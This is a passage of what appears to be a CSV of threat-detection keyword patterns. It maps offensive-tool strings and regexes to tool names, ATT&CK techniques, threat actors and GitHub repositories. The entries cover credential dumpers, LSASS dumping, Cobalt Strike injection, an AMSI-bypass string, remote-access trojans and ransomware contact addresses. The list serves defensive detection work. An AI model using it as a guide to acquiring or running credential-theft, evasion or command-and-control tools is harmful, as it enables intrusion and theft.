tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56148" "*qn.support@cyberfear.com*",".{0,1000}qn\.support\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56149" "*QSBMYSBWaWUsIEEgTCdBbW91cg==*",".{0,1000}QSBMYSBWaWUsIEEgTCdBbW91cg\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56151" "*QSBMYSBWaWUsIEEgTCdBbW91cg==*",".{0,1000}QSBMYSBWaWUsIEEgTCdBbW91cg\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","56152" "*qtc-de/remote-method-guesser*",".{0,1000}qtc\-de\/remote\-method\-guesser.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","56153" "*quantum-mirror.hu/mirrors/pub/blackarch/*/os/*",".{0,1000}quantum\-mirror\.hu\/mirrors\/pub\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","56154" "*QUAPCInjectAsSystem*",".{0,1000}QUAPCInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society 
- Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56155" "*QUAPCInjectElevated*",".{0,1000}QUAPCInjectElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56156" 
"*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","56157" "*QUAPCInjectFakecmd*",".{0,1000}QUAPCInjectFakecmd.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56158" "*QUAPCInjectWithoutPid*",".{0,1000}QUAPCInjectWithoutPid.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of 
SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","56159" "*QuarksADDumper*",".{0,1000}QuarksADDumper.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56160" 
"*quarkslab/quarkspwdump*",".{0,1000}quarkslab\/quarkspwdump.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56161" "*quarks-pwdump.exe*",".{0,1000}quarks\-pwdump\.exe.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","1","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","56162" "*quarks-pwdump.exe*",".{0,1000}quarks\-pwdump\.exe.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","1","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","56163" "*quentinhardy*msdat*",".{0,1000}quentinhardy.{0,1000}msdat.{0,1000}","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tool","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","N/A","10","909","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z","56176" "*Query-ExploitGuardProtectionHistory *",".{0,1000}Query\-ExploitGuardProtectionHistory\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - 
TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","N/A","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","56177" "*queue.localtonet.com*",".{0,1000}queue\.localtonet\.com.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","56178" "*Quiet Riot discovered one valid e-mail account*",".{0,1000}Quiet\sRiot\sdiscovered\sone\svalid\se\-mail\saccount.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56180" "*Quiet Riot discovered one valid login account*",".{0,1000}Quiet\sRiot\sdiscovered\sone\svalid\slogin\saccount.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56181" "*quiet_riot --scan_type*",".{0,1000}quiet_riot\s\-\-scan_type.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","56182" "*quser.x64.o*",".{0,1000}quser\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for 
quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","56183" "*quser.x86.o*",".{0,1000}quser\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","56184" "*quser;net sessions;query session;klist sessions*",".{0,1000}quser\;net\ssessions\;query\ssession\;klist\ssessions.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","56185" 
"*qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion*",".{0,1000}qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","56186" "*QW1zaVNjYW5CdWZmZXI=*",".{0,1000}QW1zaVNjYW5CdWZmZXI\=.{0,1000}","offensive_tool_keyword","base64","AMSI Bypass AmsiScanBuffer in base64","T1562.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","56187" "*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABiAGEAYwBrAHUAcAAuAGUAbgBjAA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABiAGEAYwBrAHUAcAAuAGUAbgBjAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56188" "*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAGQAYQB0AA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAGQAYQB0AA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56189" "*QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAHoAaQBwAA==*",".{0,1000}QwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAHkAcwBsAG8AZwAuAHoAaQBwAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security 
Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","56190" "*qwqdanchun*",".{0,1000}qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56192" "*qwqdanchun/DcRat*",".{0,1000}qwqdanchun\/DcRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","56193" "*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*",".{0,1000}QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA.{0,1000}","offensive_tool_keyword","mimikatz","invoke mimikatz string found used by the tool EDRaser ","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat 
Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","56194" "*QXh4OEF4eDhBeHg4QXh4OA==*",".{0,1000}QXh4OEF4eDhBeHg4QXh4OA\=\=.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - 
Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","N/A","10","10","412","47","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z","56195" "*r00t0v3rr1d3/merlin*",".{0,1000}r00t0v3rr1d3\/merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","56196" "*r00t-3xp10it/venom/master/bin/void.zip*",".{0,1000}r00t\-3xp10it\/venom\/master\/bin\/void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - 